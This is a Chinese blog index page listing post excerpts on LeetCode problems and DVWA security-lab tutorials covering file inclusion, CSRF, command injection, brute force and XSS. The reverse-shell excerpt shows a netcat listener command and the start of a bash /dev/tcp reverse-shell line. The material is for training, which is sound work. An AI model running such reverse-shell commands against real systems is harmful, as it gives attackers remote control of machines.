自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

  • 博客(8)
  • 收藏
  • 关注

转载 leetcode-15. 三数之和

[15] 三数之和 https://leetcode-cn.com/problems/3sum/description/ algorithms Medium (23.65%) Likes: 1259 Dislikes: 0 Total Accepted: 83.6K Total Submissions: 352.8K Testcase Example: '[-1,0,1,2,-1,-4]...

2019-08-23 01:25:00 121

转载 leetcode-401.二进制手表

[401] 二进制手表 https://leetcode-cn.com/problems/binary-watch/description/ algorithms Easy (48.85%) Likes: 73 Dislikes: 0 Total Accepted: 5.2K Total Submissions: 10.6K Testcase Example: '0' 二进制手表顶部有 ...

2019-08-17 22:30:00 166

转载 DVWA漏洞靶场-文件包含(File Inclusion)

基本知识: php中引发文件包含漏洞的通常是以下四个函数: include() include_once() require() require_once()    require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_...

2019-08-02 15:38:00 524

转载 xss 利用方式

漏洞原理   HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本...

2019-07-30 16:50:00 798

转载 DVWA漏洞靶场-跨站请求伪造(CSRF)

漏洞原理:   CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,C...

2019-07-30 01:32:00 295

转载 DVWA漏洞靶场-命令执行(Command Injection)

漏洞原理    由于开发人员编写源码,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句提交,并交由服务器端执行。命令注入攻击中WEB服务器没有过滤类似system(),eval(),exec()等函数是该漏洞攻击成功的最主要原因。   命令执行分隔符:   windows:&&  ||  &     linux:  &&am...

2019-07-30 00:59:00 481

转载 DVWA漏洞靶场-暴力破解(Brute Force)

工具:burpsuite 1.low 级别 设置代理,burp拦截,发送到intruder进行暴力破解 添加password位置,攻击类型sniper模式 设置好payload,准备好字典,开始攻击 根据响应内容长度得到密码为password 2. medium 级别 medium级别只是对输入的密码进行了一次过滤,防止sql注入,继续暴力破解 ...

2019-07-30 00:31:00 639

转载 反弹shell利用方式

反弹shell 1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i >& /dev/tcp/攻击...

2019-07-29 18:41:00 530

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除